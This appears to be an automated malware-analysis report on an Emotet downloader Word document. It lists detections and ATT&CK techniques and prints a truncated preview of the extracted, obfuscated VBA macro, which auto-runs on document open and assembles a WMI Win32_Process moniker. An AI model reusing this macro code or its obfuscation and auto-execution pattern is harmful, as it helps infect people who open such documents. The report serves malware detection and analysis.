Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7443840-1', indicating it is a downloader for the Emotet family. High-severity heuristics confirm the presence of a VBA macro with a 'Document_Open' auto-execution routine that uses 'CreateObject', a common technique for executing malicious code. The VBA macro is heavily obfuscated (padded with junk arithmetic and never-taken branches), but the extracted source concatenates string fragments into the "winmgmts:Win32_Process" moniker, which together with the heuristics strongly suggests it is designed to download and execute a secondary payload via WMI process creation.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-7443840-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7443840-1
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open auto-execution macro present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call present in macro code
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6806 bytes | 82daf0565dd08e7a55622b6ad9c3a3a2c2fffefbd3f448a0028777dcbb5c7498 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Hsheolxjq"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Oqtpvnezgruyv, 0, 0, MSForms, TextBox"
Private Sub Document_open()
If Itzrwjrpbumny < Fjnugjvfmlgol Then
Dbpyyfbxqq = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Xupnpdwszq = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
If Xsgujaymdy < Nywmziymqqaa Then
Bhzyruhup = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Uzzlejhiktpip = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
If Wydlxhuc < Rofqjxburt Then
Dxmobnixc = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Glchrcmmw = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Wipqofqtwf
End Sub
Attribute VB_Name = "Ytxatmhtmzwws"
Attribute VB_Base = "0{7877343A-A91B-4E70-BD18-4B92B01BE467}{8D35FCA3-B952-434F-B145-8CBE4F265D74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Gwgukvssw"
Function Afsynwxyikrvn()
If Wjkynqyyb < Gsxabfzdakr Then
Oghsyrpm = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Uxmovbtfqrd = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Yckvqopj = Hsheolxjq.Oqtpvnezgruyv
If Nnmcllqjuz < Xrejsbpwyfblx Then
Iewyfeqwkxvfh = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Oqkelraewf = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Wskkshmhqed = Yckvqopj + Ytxatmhtmzwws.Qgmqoung + Ytxatmhtmzwws.Wjskmglqazj + Ytxatmhtmzwws.Qmvoiabe
If Ghrxlavejfi < Ajovhxyug Then
Ixthaabok = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Bmrlqfxaccxz = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Gwmuaxwh = Wskkshmhqed + Ytxatmhtmzwws.Zoqfwpvlhox + Ytxatmhtmzwws.Ivioppxdi
If Bawbcohv < Hrpahbig Then
Txfzlkuzs = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Cidjyhdwfnlxo = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Afsynwxyikrvn = Tlijpoegl + Gwmuaxwh + Tlijpoegl
If Daoepmfjsejlz < Xsitajmxys Then
Bjudqfio = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Zsrckyciba = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
End Function
Function Wipqofqtwf()
If Xxtfqwynmubwn < Rlfpczuwvqcz Then
Ximtldtvdnc = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Pnyzjbcbs = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Drvuxxgds = E + "wi" + "n" + f + "mgmt" + g + "s:Win32_P" + n + "rocess"
If Aeytrhpndgn < Xzivaxvjdc Then
Ggtzrlsoszyh = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin
... (truncated)